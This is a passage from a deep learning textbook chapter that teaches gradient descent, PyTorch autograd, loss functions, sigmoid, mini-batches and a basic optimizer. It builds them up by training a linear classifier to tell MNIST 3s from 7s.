We want to find the specific values for the vector `w` that causes the result of our function to be high for those images that are actually 8s, and low for those images that are not. Searching for the best vector `w` is a way to search for the best function for recognizing 8s. (Because we are not yet using a deep neural network, we are limited by what our function can actually do—we are going to fix that constraint later in this chapter.) To be more specific, here are the steps that we are going to require, to turn this function into a machine learning classifier: 1. *Initialize* the weights. 1. For each image, use these weights to *predict* whether it appears to be a 3 or a 7. 1. Based on these predictions, calculate how good the model is (its *loss*). 1. Calculate the *gradient*, which measures for each weight, how changing that weight would change the loss. 1. *Step* (that is, change) all the weights based on that calculation. 1. Go back to step 2, and *repeat* the process. 1. Iterate until you decide to *stop* the training process (for instance, because the model is good enough or you don't want to wait any longer). These seven steps, illustrated in <<gradient_descent>>, are the key to the training of all deep learning models. That deep learning turns out to rely entirely on these steps is extremely surprising and counterintuitive. It's amazing that this process can solve such complex problems. But, as you'll see, it really does! ``` #id gradient_descent #caption The gradient descent process #alt Graph showing the steps for Gradient Descent gv(''' init->predict->loss->gradient->step->stop step->predict[label=repeat] ''') ``` There are many different ways to do each of these seven steps, and we will be learning about them throughout the rest of this book. These are the details that make a big difference for deep learning practitioners, but it turns out that the general approach to each one generally follows some basic principles. 
Here are a few guidelines: - Initialize:: We initialize the parameters to random values. This may sound surprising. There are certainly other choices we could make, such as initializing them to the percentage of times that pixel is activated for that category—but since we already know that we have a routine to improve these weights, it turns out that just starting with random weights works perfectly well. - Loss:: This is what Samuel referred to when he spoke of *testing the effectiveness of any current weight assignment in terms of actual performance*. We need some function that will return a number that is small if the performance of the model is good (the standard approach is to treat a small loss as good, and a large loss as bad, although this is just a convention). - Step:: A simple way to figure out whether a weight should be increased a bit, or decreased a bit, would be just to try it: increase the weight by a small amount, and see if the loss goes up or down. Once you find the correct direction, you could then change that amount by a bit more, and a bit less, until you find an amount that works well. However, this is slow! As we will see, the magic of calculus allows us to directly figure out in which direction, and by roughly how much, to change each weight, without having to try all these small changes. The way to do this is by calculating *gradients*. This is just a performance optimization, we would get exactly the same results by using the slower manual process as well. - Stop:: Once we've decided how many epochs to train the model for (a few suggestions for this were given in the earlier list), we apply that decision. This is where that decision is applied. For our digit classifier, we would keep training until the accuracy of the model started getting worse, or we ran out of time. Before applying these steps to our image classification problem, let's illustrate what they look like in a simpler case. 
First we will define a very simple function, the quadratic—let's pretend that this is our loss function, and `x` is a weight parameter of the function: ``` def f(x): return x**2 ``` Here is a graph of that function: ``` plot_function(f, 'x', 'x**2') ``` The sequence of steps we described earlier starts by picking some random value for a parameter, and calculating the value of the loss: ``` plot_function(f, 'x', 'x**2') plt.scatter(-1.5, f(-1.5), color='red'); ``` Now we look to see what would happen if we increased or decreased our parameter by a little bit—the *adjustment*. This is simply the slope at a particular point: <img alt="A graph showing the squared function with the slope at one point" width="400" src="images/grad_illustration.svg"/> We can change our weight by a little in the direction of the slope, calculate our loss and adjustment again, and repeat this a few times. Eventually, we will get to the lowest point on our curve: <img alt="An illustration of gradient descent" width="400" src="images/chapter2_perfect.svg"/> This basic idea goes all the way back to Isaac Newton, who pointed out that we can optimize arbitrary functions in this way. Regardless of how complicated our functions become, this basic approach of gradient descent will not significantly change. The only minor changes we will see later in this book are some handy ways we can make it faster, by finding better steps. ### Calculating Gradients The one magic step is the bit where we calculate the gradients. As we mentioned, we use calculus as a performance optimization; it allows us to more quickly calculate whether our loss will go up or down when we adjust our parameters up or down. In other words, the gradients will tell us how much we have to change each weight to make our model better. You may remember from your high school calculus class that the *derivative* of a function tells you how much a change in its parameters will change its result. 
If not, don't worry, lots of us forget calculus once high school is behind us! But you will have to have some intuitive understanding of what a derivative is before you continue, so if this is all very fuzzy in your head, head over to Khan Academy and complete the [lessons on basic derivatives](https://www.khanacademy.org/math/differential-calculus/dc-diff-intro). You won't have to know how to calculate them yourselves, you just have to know what a derivative is. The key point about a derivative is this: for any function, such as the quadratic function we saw in the previous section, we can calculate its derivative. The derivative is another function. It calculates the change, rather than the value. For instance, the derivative of the quadratic function at the value 3 tells us how rapidly the function changes at the value 3. More specifically, you may recall that gradient is defined as *rise/run*, that is, the change in the value of the function, divided by the change in the value of the parameter. When we know how our function will change, then we know what we need to do to make it smaller. This is the key to machine learning: having a way to change the parameters of a function to make it smaller. Calculus provides us with a computational shortcut, the derivative, which lets us directly calculate the gradients of our functions. One important thing to be aware of is that our function has lots of weights that we need to adjust, so when we calculate the derivative we won't get back one number, but lots of them—a gradient for every weight. But there is nothing mathematically tricky here; you can calculate the derivative with respect to one weight, and treat all the other ones as constant, then repeat that for each other weight. This is how all of the gradients are calculated, for every weight. We mentioned just now that you won't have to calculate any gradients yourself. How can that be? 
Amazingly enough, PyTorch is able to automatically compute the derivative of nearly any function! What's more, it does it very fast. Most of the time, it will be at least as fast as any derivative function that you can create by hand. Let's see an example. First, let's pick a tensor value which we want gradients at: ``` xt = tensor(3.).requires_grad_() ``` Notice the special method `requires_grad_`? That's the magical incantation we use to tell PyTorch that we want to calculate gradients with respect to that variable at that value. It is essentially tagging the variable, so PyTorch will remember to keep track of how to compute gradients of the other, direct calculations on it that you will ask for. > a: This API might throw you off if you're coming from math or physics. In those contexts the "gradient" of a function is just another function (i.e., its derivative), so you might expect gradient-related APIs to give you a new function. But in deep learning, "gradients" usually means the _value_ of a function's derivative at a particular argument value. The PyTorch API also puts the focus on the argument, not the function you're actually computing the gradients of. It may feel backwards at first, but it's just a different perspective. Now we calculate our function with that value. Notice how PyTorch prints not just the value calculated, but also a note that it has a gradient function it'll be using to calculate our gradients when needed: ``` yt = f(xt) yt ``` Finally, we tell PyTorch to calculate the gradients for us: ``` yt.backward() ``` The "backward" here refers to *backpropagation*, which is the name given to the process of calculating the derivative of each layer. We'll see how this is done exactly in chapter <<chapter_foundations>>, when we calculate the gradients of a deep neural net from scratch. This is called the "backward pass" of the network, as opposed to the "forward pass," which is where the activations are calculated. 
Life would probably be easier if `backward` was just called `calculate_grad`, but deep learning folks really do like to add jargon everywhere they can! We can now view the gradients by checking the `grad` attribute of our tensor: ``` xt.grad ``` If you remember your high school calculus rules, the derivative of `x**2` is `2*x`, and we have `x=3`, so the gradients should be `2*3=6`, which is what PyTorch calculated for us! Now we'll repeat the preceding steps, but with a vector argument for our function: ``` xt = tensor([3.,4.,10.]).requires_grad_() xt ``` And we'll add `sum` to our function so it can take a vector (i.e., a rank-1 tensor), and return a scalar (i.e., a rank-0 tensor): ``` def f(x): return (x**2).sum() yt = f(xt) yt ``` Our gradients are `2*xt`, as we'd expect! ``` yt.backward() xt.grad ``` The gradients only tell us the slope of our function, they don't actually tell us exactly how far to adjust the parameters. But it gives us some idea of how far; if the slope is very large, then that may suggest that we have more adjustments to do, whereas if the slope is very small, that may suggest that we are close to the optimal value. ### Stepping With a Learning Rate Deciding how to change our parameters based on the values of the gradients is an important part of the deep learning process. Nearly all approaches start with the basic idea of multiplying the gradient by some small number, called the *learning rate* (LR). The learning rate is often a number between 0.001 and 0.1, although it could be anything. Often, people select a learning rate just by trying a few, and finding which results in the best model after training (we'll show you a better approach later in this book, called the *learning rate finder*). Once you've picked a learning rate, you can adjust your parameters using this simple function: ``` w -= gradient(w) * lr ``` This is known as *stepping* your parameters, using an *optimizer step*. 
If you pick a learning rate that's too low, it can mean having to do a lot of steps. <<descent_small>> illustrates that. <img alt="An illustration of gradient descent with a LR too low" width="400" caption="Gradient descent with low LR" src="images/chapter2_small.svg" id="descent_small"/> But picking a learning rate that's too high is even worse—it can actually result in the loss getting *worse*, as we see in <<descent_div>>! <img alt="An illustration of gradient descent with a LR too high" width="400" caption="Gradient descent with high LR" src="images/chapter2_div.svg" id="descent_div"/> If the learning rate is too high, it may also "bounce" around, rather than actually diverging; <<descent_bouncy>> shows how this has the result of taking many steps to train successfully. <img alt="An illustration of gradient descent with a bouncy LR" width="400" caption="Gradient descent with bouncy LR" src="images/chapter2_bouncy.svg" id="descent_bouncy"/> Now let's apply all of this in an end-to-end example. ### An End-to-End SGD Example We've seen how to use gradients to find a minimum. Now it's time to look at an SGD example and see how finding a minimum can be used to train a model to fit data better. Let's start with a simple, synthetic, example model. Imagine you were measuring the speed of a roller coaster as it went over the top of a hump. It would start fast, and then get slower as it went up the hill; it would be slowest at the top, and it would then speed up again as it went downhill. You want to build a model of how the speed changes over time. If you were measuring the speed manually every second for 20 seconds, it might look something like this: ``` time = torch.arange(0,20).float(); time speed = torch.randn(20)*3 + 0.75*(time-9.5)**2 + 1 plt.scatter(time,speed); ``` We've added a bit of random noise, since measuring things manually isn't precise. This means it's not that easy to answer the question: what was the roller coaster's speed? 
Using SGD we can try to find a function that matches our observations. We can't consider every possible function, so let's use a guess that it will be quadratic; i.e., a function of the form `a*(time**2)+(b*time)+c`. We want to distinguish clearly between the function's input (the time when we are measuring the coaster's speed) and its parameters (the values that define *which* quadratic we're trying). So, let's collect the parameters in one argument and thus separate the input, `t`, and the parameters, `params`, in the function's signature: ``` def f(t, params): a,b,c = params return a*(t**2) + (b*t) + c ``` In other words, we've restricted the problem of finding the best imaginable function that fits the data, to finding the best *quadratic* function. This greatly simplifies the problem, since every quadratic function is fully defined by the three parameters `a`, `b`, and `c`. Thus, to find the best quadratic function, we only need to find the best values for `a`, `b`, and `c`. If we can solve this problem for the three parameters of a quadratic function, we'll be able to apply the same approach for other, more complex functions with more parameters—such as a neural net. Let's find the parameters for `f` first, and then we'll come back and do the same thing for the MNIST dataset with a neural net. We need to define first what we mean by "best." We define this precisely by choosing a *loss function*, which will return a value based on a prediction and a target, where lower values of the function correspond to "better" predictions. For continuous data, it's common to use *mean squared error*: ``` def mse(preds, targets): return ((preds-targets)**2).mean() ``` Now, let's work through our 7 step process. 
#### Step 1: Initialize the parameters First, we initialize the parameters to random values, and tell PyTorch that we want to track their gradients, using `requires_grad_`: ``` params = torch.randn(3).requires_grad_() #hide orig_params = params.clone() ``` #### Step 2: Calculate the predictions Next, we calculate the predictions: ``` preds = f(time, params) ``` Let's create a little function to see how close our predictions are to our targets, and take a look: ``` def show_preds(preds, ax=None): if ax is None: ax=plt.subplots()[1] ax.scatter(time, speed) ax.scatter(time, to_np(preds), color='red') ax.set_ylim(-300,100) show_preds(preds) ``` This doesn't look very close—our random parameters suggest that the roller coaster will end up going backwards, since we have negative speeds! #### Step 3: Calculate the loss We calculate the loss as follows: ``` loss = mse(preds, speed) loss ``` Our goal is now to improve this. To do that, we'll need to know the gradients. #### Step 4: Calculate the gradients The next step is to calculate the gradients. In other words, calculate an approximation of how the parameters need to change: ``` loss.backward() params.grad params.grad * 1e-5 ``` We can use these gradients to improve our parameters. We'll need to pick a learning rate (we'll discuss how to do that in practice in the next chapter; for now we'll just use 1e-5, or 0.00001): ``` params ``` #### Step 5: Step the weights. Now we need to update the parameters based on the gradients we just calculated: ``` lr = 1e-5 params.data -= lr * params.grad.data params.grad = None ``` > a: Understanding this bit depends on remembering recent history. To calculate the gradients we call `backward` on the `loss`. 
But this `loss` was itself calculated by `mse`, which in turn took `preds` as an input, which was calculated using `f` taking as an input `params`, which was the object on which we originally called `requires_grad_`—which is the original call that now allows us to call `backward` on `loss`. This chain of function calls represents the mathematical composition of functions, which enables PyTorch to use calculus's chain rule under the hood to calculate these gradients. Let's see if the loss has improved: ``` preds = f(time,params) mse(preds, speed) ``` And take a look at the plot: ``` show_preds(preds) ``` We need to repeat this a few times, so we'll create a function to apply one step: ``` def apply_step(params, prn=True): preds = f(time, params) loss = mse(preds, speed) loss.backward() params.data -= lr * params.grad.data params.grad = None if prn: print(loss.item()) return preds ``` #### Step 6: Repeat the process Now we iterate. By looping and performing many improvements, we hope to reach a good result: ``` for i in range(10): apply_step(params) #hide params = orig_params.detach().requires_grad_() ``` The loss is going down, just as we hoped! But looking only at these loss numbers disguises the fact that each iteration represents an entirely different quadratic function being tried, on the way to finding the best possible quadratic function. We can see this process visually if, instead of printing out the loss function, we plot the function at every step. Then we can see how the shape is approaching the best possible quadratic function for our data: ``` _,axs = plt.subplots(1,4,figsize=(12,3)) for ax in axs: show_preds(apply_step(params, False), ax) plt.tight_layout() ``` #### Step 7: stop We just decided to stop after 10 epochs arbitrarily. In practice, we would watch the training and validation losses and our metrics to decide when to stop, as we've discussed. 
### Summarizing Gradient Descent ``` #hide_input #id gradient_descent #caption The gradient descent process #alt Graph showing the steps for Gradient Descent gv(''' init->predict->loss->gradient->step->stop step->predict[label=repeat] ''') ``` To summarize, at the beginning, the weights of our model can be random (training *from scratch*) or come from a pretrained model (*transfer learning*). In the first case, the output we will get from our inputs won't have anything to do with what we want, and even in the second case, it's very likely the pretrained model won't be very good at the specific task we are targeting. So the model will need to *learn* better weights. We begin by comparing the outputs the model gives us with our targets (we have labeled data, so we know what result the model should give) using a *loss function*, which returns a number that we want to make as low as possible by improving our weights. To do this, we take a few data items (such as images) from the training set and feed them to our model. We compare the corresponding targets using our loss function, and the score we get tells us how wrong our predictions were. We then change the weights a little bit to make it slightly better. To find how to change the weights to make the loss a bit better, we use calculus to calculate the *gradients*. (Actually, we let PyTorch do it for us!) Let's consider an analogy. Imagine you are lost in the mountains with your car parked at the lowest point. To find your way back to it, you might wander in a random direction, but that probably wouldn't help much. Since you know your vehicle is at the lowest point, you would be better off going downhill. By always taking a step in the direction of the steepest downward slope, you should eventually arrive at your destination. 
We use the magnitude of the gradient (i.e., the steepness of the slope) to tell us how big a step to take; specifically, we multiply the gradient by a number we choose called the *learning rate* to decide on the step size. We then *iterate* until we have reached the lowest point, which will be our parking lot, then we can *stop*. All of that we just saw can be transposed directly to the MNIST dataset, except for the loss function. Let's now see how we can define a good training objective. ## The MNIST Loss Function We already have our dependent variables `x`—these are the images themselves. We'll concatenate them all into a single tensor, and also change them from a list of matrices (a rank-3 tensor) to a list of vectors (a rank-2 tensor). We can do this using `view`, which is a PyTorch method that changes the shape of a tensor without changing its contents. `-1` is a special parameter to `view` that means "make this axis as big as necessary to fit all the data": ``` train_x = torch.cat([stacked_threes, stacked_sevens]).view(-1, 28*28) ``` We need a label for each image. We'll use `1` for 3s and `0` for 7s: ``` train_y = tensor([1]*len(threes) + [0]*len(sevens)).unsqueeze(1) train_x.shape,train_y.shape ``` A `Dataset` in PyTorch is required to return a tuple of `(x,y)` when indexed. 
Python provides a `zip` function which, when combined with `list`, provides a simple way to get this functionality: ``` dset = list(zip(train_x,train_y)) x,y = dset[0] x.shape,y valid_x = torch.cat([valid_3_tens, valid_7_tens]).view(-1, 28*28) valid_y = tensor([1]*len(valid_3_tens) + [0]*len(valid_7_tens)).unsqueeze(1) valid_dset = list(zip(valid_x,valid_y)) ``` Now we need an (initially random) weight for every pixel (this is the *initialize* step in our seven-step process): ``` def init_params(size, std=1.0): return (torch.randn(size)*std).requires_grad_() weights = init_params((28*28,1)) ``` The function `weights*pixels` won't be flexible enough—it is always equal to 0 when the pixels are equal to 0 (i.e., its *intercept* is 0). You might remember from high school math that the formula for a line is `y=w*x+b`; we still need the `b`. We'll initialize it to a random number too: ``` bias = init_params(1) ``` In neural networks, the `w` in the equation `y=w*x+b` is called the *weights*, and the `b` is called the *bias*. Together, the weights and bias make up the *parameters*. > jargon: Parameters: The _weights_ and _biases_ of a model. The weights are the `w` in the equation `w*x+b`, and the biases are the `b` in that equation. We can now calculate a prediction for one image: ``` (train_x[0]*weights.T).sum() + bias ``` While we could use a Python `for` loop to calculate the prediction for each image, that would be very slow. Because Python loops don't run on the GPU, and because Python is a slow language for loops in general, we need to represent as much of the computation in a model as possible using higher-level functions. In this case, there's an extremely convenient mathematical operation that calculates `w*x` for every row of a matrix—it's called *matrix multiplication*. <<matmul>> shows what matrix multiplication looks like. 
<img alt="Matrix multiplication" width="400" caption="Matrix multiplication" src="images/matmul2.svg" id="matmul"/> This image shows two matrices, `A` and `B`, being multiplied together. Each item of the result, which we'll call `AB`, contains each item of its corresponding row of `A` multiplied by each item of its corresponding column of `B`, added together. For instance, row 1, column 2 (the orange dot with a red border) is calculated as $a_{1,1} * b_{1,2} + a_{1,2} * b_{2,2}$. If you need a refresher on matrix multiplication, we suggest you take a look at the [Intro to Matrix Multiplication](https://youtu.be/kT4Mp9EdVqs) on *Khan Academy*, since this is the most important mathematical operation in deep learning. In Python, matrix multiplication is represented with the `@` operator. Let's try it: ``` def linear1(xb): return xb@weights + bias preds = linear1(train_x) preds ``` The first element is the same as we calculated before, as we'd expect. This equation, `batch@weights + bias`, is one of the two fundamental equations of any neural network (the other one is the *activation function*, which we'll see in a moment). Let's check our accuracy. To decide if an output represents a 3 or a 7, we can just check whether it's greater than 0, so our accuracy for each item can be calculated (using broadcasting, so no loops!) with: ``` corrects = (preds>0.0).float() == train_y corrects corrects.float().mean().item() ``` Now let's see what the change in accuracy is for a small change in one of the weights: ``` weights[0] *= 1.0001 preds = linear1(train_x) ((preds>0.0).float() == train_y).float().mean().item() ``` As we've seen, we need gradients in order to improve our model using SGD, and in order to calculate gradients we need some *loss function* that represents how good our model is. That is because the gradients are a measure of how that loss function changes with small tweaks to the weights. So, we need to choose a loss function. 
The obvious approach would be to use accuracy, which is our metric, as our loss function as well. In this case, we would calculate our prediction for each image, collect these values to calculate an overall accuracy, and then calculate the gradients of each weight with respect to that overall accuracy. Unfortunately, we have a significant technical problem here. The gradient of a function is its *slope*, or its steepness, which can be defined as *rise over run*—that is, how much the value of the function goes up or down, divided by how much we changed the input. We can write this mathematically as: `(y_new - y_old) / (x_new - x_old)`. This gives us a good approximation of the gradient when `x_new` is very similar to `x_old`, meaning that their difference is very small. But accuracy only changes at all when a prediction changes from a 3 to a 7, or vice versa. The problem is that a small change in weights from `x_old` to `x_new` isn't likely to cause any prediction to change, so `(y_new - y_old)` will almost always be 0. In other words, the gradient is 0 almost everywhere. A very small change in the value of a weight will often not actually change the accuracy at all. This means it is not useful to use accuracy as a loss function—if we do, most of the time our gradients will actually be 0, and the model will not be able to learn from that number. > S: In mathematical terms, accuracy is a function that is constant almost everywhere (except at the threshold, 0.5), so its derivative is nil almost everywhere (and infinity at the threshold). This then gives gradients that are 0 or infinite, which are useless for updating the model. Instead, we need a loss function which, when our weights result in slightly better predictions, gives us a slightly better loss. So what does a "slightly better prediction" look like, exactly? 
Well, in this case, it means that if the correct answer is a 3 the score is a little higher, or if the correct answer is a 7 the score is a little lower. Let's write such a function now. What form does it take? The loss function receives not the images themselves, but the predictions from the model. Let's make one argument, `prds`, of values between 0 and 1, where each value is the prediction that an image is a 3. It is a vector (i.e., a rank-1 tensor), indexed over the images. The purpose of the loss function is to measure the difference between predicted values and the true values — that is, the targets (aka labels). Let's make another argument, `trgts`, with values of 0 or 1 which tells whether an image actually is a 3 or not. It is also a vector (i.e., another rank-1 tensor), indexed over the images. So, for instance, suppose we had three images which we knew were a 3, a 7, and a 3. And suppose our model predicted with high confidence (`0.9`) that the first was a 3, with slight confidence (`0.4`) that the second was a 7, and with fair confidence (`0.2`), but incorrectly, that the last was a 7. This would mean our loss function would receive these values as its inputs: ``` trgts = tensor([1,0,1]) prds = tensor([0.9, 0.4, 0.2]) ``` Here's a first try at a loss function that measures the distance between `predictions` and `targets`: ``` def mnist_loss(predictions, targets): return torch.where(targets==1, 1-predictions, predictions).mean() ``` We're using a new function, `torch.where(a,b,c)`. This is the same as running the list comprehension `[b[i] if a[i] else c[i] for i in range(len(a))]`, except it works on tensors, at C/CUDA speed. In plain English, this function will measure how distant each prediction is from 1 if it should be 1, and how distant it is from 0 if it should be 0, and then it will take the mean of all those distances. 
> note: Read the Docs: It's important to learn about PyTorch functions like this, because looping over tensors in Python performs at Python speed, not C/CUDA speed! Try running `help(torch.where)` now to read the docs for this function, or, better still, look it up on the PyTorch documentation site. Let's try it on our `prds` and `trgts`: ``` torch.where(trgts==1, 1-prds, prds) ``` You can see that this function returns a lower number when predictions are more accurate, when accurate predictions are more confident (higher absolute values), and when inaccurate predictions are less confident. In PyTorch, we always assume that a lower value of a loss function is better. Since we need a scalar for the final loss, `mnist_loss` takes the mean of the previous tensor: ``` mnist_loss(prds,trgts) ``` For instance, if we change our prediction for the one "false" target from `0.2` to `0.8` the loss will go down, indicating that this is a better prediction: ``` mnist_loss(tensor([0.9, 0.4, 0.8]),trgts) ``` One problem with `mnist_loss` as currently defined is that it assumes that predictions are always between 0 and 1. We need to ensure, then, that this is actually the case! As it happens, there is a function that does exactly that—let's take a look. ### Sigmoid The `sigmoid` function always outputs a number between 0 and 1. It's defined as follows: ``` def sigmoid(x): return 1/(1+torch.exp(-x)) ``` Pytorch defines an accelerated version for us, so we don’t really need our own. This is an important function in deep learning, since we often want to ensure values are between 0 and 1. This is what it looks like: ``` plot_function(torch.sigmoid, title='Sigmoid', min=-4, max=4) ``` As you can see, it takes any input value, positive or negative, and smooshes it onto an output value between 0 and 1. It's also a smooth curve that only goes up, which makes it easier for SGD to find meaningful gradients. 
Let's update `mnist_loss` to first apply `sigmoid` to the inputs: ``` def mnist_loss(predictions, targets): predictions = predictions.sigmoid() return torch.where(targets==1, 1-predictions, predictions).mean() ``` Now we can be confident our loss function will work, even if the predictions are not between 0 and 1. All that is required is that a higher prediction corresponds to higher confidence an image is a 3. Having defined a loss function, now is a good moment to recapitulate why we did this. After all, we already had a metric, which was overall accuracy. So why did we define a loss? The key difference is that the metric is to drive human understanding and the loss is to drive automated learning. To drive automated learning, the loss must be a function that has a meaningful derivative. It can't have big flat sections and large jumps, but instead must be reasonably smooth. This is why we designed a loss function that would respond to small changes in confidence level. This requirement means that sometimes it does not really reflect exactly what we are trying to achieve, but is rather a compromise between our real goal, and a function that can be optimized using its gradient. The loss function is calculated for each item in our dataset, and then at the end of an epoch the loss values are all averaged and the overall mean is reported for the epoch. Metrics, on the other hand, are the numbers that we really care about. These are the values that are printed at the end of each epoch that tell us how our model is really doing. It is important that we learn to focus on these metrics, rather than the loss, when judging the performance of a model. ### SGD and Mini-Batches Now that we have a loss function that is suitable for driving SGD, we can consider some of the details involved in the next phase of the learning process, which is to change or update the weights based on the gradients. This is called an *optimization step*. 
In order to take an optimization step we need to calculate the loss over one or more data items. How many should we use? We could calculate it for the whole dataset, and take the average, or we could calculate it for a single data item. But neither of these is ideal. Calculating it for the whole dataset would take a very long time. Calculating it for a single item would not use much information, so it would result in a very imprecise and unstable gradient. That is, you'd be going to the trouble of updating the weights, but taking into account only how that would improve the model's performance on that single item. So instead we take a compromise between the two: we calculate the average loss for a few data items at a time. This is called a *mini-batch*. The number of data items in the mini-batch is called the *batch size*. A larger batch size means that you will get a more accurate and stable estimate of your dataset's gradients from the loss function, but it will take longer, and you will process fewer mini-batches per epoch. Choosing a good batch size is one of the decisions you need to make as a deep learning practitioner to train your model quickly and accurately. We will talk about how to make this choice throughout this book. Another good reason for using mini-batches rather than calculating the gradient on individual data items is that, in practice, we nearly always do our training on an accelerator such as a GPU. These accelerators only perform well if they have lots of work to do at a time, so it's helpful if we can give them lots of data items to work on. Using mini-batches is one of the best ways to do this. However, if you give them too much data to work on at once, they run out of memory—making GPUs happy is also tricky! As we saw in our discussion of data augmentation in <<chapter_production>>, we get better generalization if we can vary things during training. One simple and effective thing we can vary is what data items we put in each mini-batch. 
Rather than simply enumerating our dataset in order for every epoch, instead what we normally do is randomly shuffle it on every epoch, before we create mini-batches. PyTorch and fastai provide a class that will do the shuffling and mini-batch collation for you, called `DataLoader`. A `DataLoader` can take any Python collection and turn it into an iterator over many batches, like so: ``` coll = range(15) dl = DataLoader(coll, batch_size=5, shuffle=True) list(dl) ``` For training a model, we don't just want any Python collection, but a collection containing independent and dependent variables (that is, the inputs and targets of the model). A collection that contains tuples of independent and dependent variables is known in PyTorch as a `Dataset`. Here's an example of an extremely simple `Dataset`: ``` ds = L(enumerate(string.ascii_lowercase)) ds ``` When we pass a `Dataset` to a `DataLoader` we will get back many batches which are themselves tuples of tensors representing batches of independent and dependent variables: ``` dl = DataLoader(ds, batch_size=6, shuffle=True) list(dl) ``` We are now ready to write our first training loop for a model using SGD! ## Putting It All Together It's time to implement the process we saw in <<gradient_descent>>. 
In code, our process will be implemented something like this for each epoch: ```python for x,y in dl: pred = model(x) loss = loss_func(pred, y) loss.backward() parameters -= parameters.grad * lr ``` First, let's re-initialize our parameters: ``` weights = init_params((28*28,1)) bias = init_params(1) ``` A `DataLoader` can be created from a `Dataset`: ``` dl = DataLoader(dset, batch_size=256) xb,yb = first(dl) xb.shape,yb.shape ``` We'll do the same for the validation set: ``` valid_dl = DataLoader(valid_dset, batch_size=256) ``` Let's create a mini-batch of size 4 for testing: ``` batch = train_x[:4] batch.shape preds = linear1(batch) preds loss = mnist_loss(preds, train_y[:4]) loss ``` Now we can calculate the gradients: ``` loss.backward() weights.grad.shape,weights.grad.mean(),bias.grad ``` Let's put that all in a function: ``` def calc_grad(xb, yb, model): preds = model(xb) loss = mnist_loss(preds, yb) loss.backward() ``` and test it: ``` calc_grad(batch, train_y[:4], linear1) weights.grad.mean(),bias.grad ``` But look what happens if we call it twice: ``` calc_grad(batch, train_y[:4], linear1) weights.grad.mean(),bias.grad ``` The gradients have changed! The reason for this is that `loss.backward` actually *adds* the gradients of `loss` to any gradients that are currently stored. So, we have to set the current gradients to 0 first: ``` weights.grad.zero_() bias.grad.zero_(); ``` > note: Inplace Operations: Methods in PyTorch whose names end in an underscore modify their objects _in place_. For instance, `bias.zero_()` sets all elements of the tensor `bias` to 0. Our only remaining step is to update the weights and biases based on the gradient and learning rate. When we do so, we have to tell PyTorch not to take the gradient of this step too—otherwise things will get very confusing when we try to compute the derivative at the next batch! If we assign to the `data` attribute of a tensor then PyTorch will not take the gradient of that step. 
Here's our basic training loop for an epoch: ``` def train_epoch(model, lr, params): for xb,yb in dl: calc_grad(xb, yb, model) for p in params: p.data -= p.grad*lr p.grad.zero_() ``` We also want to check how we're doing, by looking at the accuracy of the validation set. To decide if an output represents a 3 or a 7, we can just check whether it's greater than 0. So our accuracy for each item can be calculated (using broadcasting, so no loops!) with: ``` (preds>0.0).float() == train_y[:4] ``` That gives us this function to calculate our validation accuracy: ``` def batch_accuracy(xb, yb): preds = xb.sigmoid() correct = (preds>0.5) == yb return correct.float().mean() ``` We can check it works: ``` batch_accuracy(linear1(batch), train_y[:4]) ``` and then put the batches together: ``` def validate_epoch(model): accs = [batch_accuracy(model(xb), yb) for xb,yb in valid_dl] return round(torch.stack(accs).mean().item(), 4) validate_epoch(linear1) ``` That's our starting point. Let's train for one epoch, and see if the accuracy improves: ``` lr = 1. params = weights,bias train_epoch(linear1, lr, params) validate_epoch(linear1) ``` Then do a few more: ``` for i in range(20): train_epoch(linear1, lr, params) print(validate_epoch(linear1), end=' ') ``` Looking good! We're already about at the same accuracy as our "pixel similarity" approach, and we've created a general-purpose foundation we can build on. Our next step will be to create an object that will handle the SGD step for us. In PyTorch, it's called an *optimizer*. ### Creating an Optimizer Because this is such a general foundation, PyTorch provides some useful classes to make it easier to implement. The first thing we can do is replace our `linear1` function with PyTorch's `nn.Linear` module. A *module* is an object of a class that inherits from the PyTorch `nn.Module` class. 
Objects of this class behave identically to standard Python functions, in that you can call them using parentheses and they will return the activations of a model. `nn.Linear` does the same thing as our `init_params` and `linear` together. It contains both the *weights* and *biases* in a single class. Here's how we replicate our model from the previous section: ``` linear_model = nn.Linear(28*28,1) ``` Every PyTorch module knows what parameters it has that can be trained; they are available through the `parameters` method: ``` w,b = linear_model.parameters() w.shape,b.shape ``` We can use this information to create an optimizer: ``` class BasicOptim: def __init__(self,params,lr): self.params,self.lr = list(params),lr def step(self, *args, **kwargs): for p in self.params: p.data -= p.grad.data * self.lr def zero_grad(self, *args, **kwargs): for p in self.params: p.grad = None ``` We can create our optimizer by passing in the model's parameters: ``` opt = BasicOptim(linear_model.parameters(), lr) ``` Our training loop can now be simplified to: ``` def train_epoch(model): for xb,yb in dl: calc_grad(xb, yb, model) opt.step() opt.zero_grad() ``` Our validation function doesn't need to change at all: ``` validate_epoch(linear_model) ``` Let's put our little training loop in a function, to make things simpler: ``` def train_model(model, epochs): for i in range(epochs): train_epoch(model) print(validate_epoch(model), end=' ') ``` The results are the same as in the previous section: ``` train_model(linear_model, 20) ``` fastai provides the `SGD` class which, by default, does the same thing as our `BasicOptim`: ``` linear_model = nn.Linear(28*28,1) opt = SGD(linear_model.parameters(), lr) train_model(linear_model, 20) ``` fastai also provides `Learner.fit`, which we can use instead of `train_model`. 
To create a `Learner` we first need to create a `DataLoaders`, by passing in our training and validation `DataLoader`s: ``` dls = DataLoaders(dl, valid_dl) ``` To create a `Learner` without using an application (such as `cnn_learner`) we need to pass in all the elements that we've created in this chapter: the `DataLoaders`, the model, the optimization function (which will be passed the parameters), the loss function, and optionally any metrics to print: ``` learn = Learner(dls, nn.Linear(28*28,1), opt_func=SGD, loss_func=mnist_loss, metrics=batch_accuracy) ``` Now we can call `fit`: ``` learn.fit(10, lr=lr) ``` As you can see, there's nothing magic about the PyTorch and fastai classes. They are just convenient pre-packaged pieces that make your life a bit easier! (They also provide a lot of extra functionality we'll be using in future chapters.) With these classes, we can now replace our linear model with a neural network. ## Adding a Nonlinearity So far we have a general procedure for optimizing the parameters of a function, and we have tried it out on a very boring function: a simple linear classifier. A linear classifier is very constrained in terms of what it can do. To make it a bit more complex (and able to handle more tasks), we need to add something nonlinear between two linear classifiers—this is what gives us a neural network. Here is the entire definition of a basic neural network: ``` def simple_net(xb): res = xb@w1 + b1 res = res.max(tensor(0.0)) res = res@w2 + b2 return res ``` That's it! All we have in `simple_net` is two linear classifiers with a `max` function between them. 
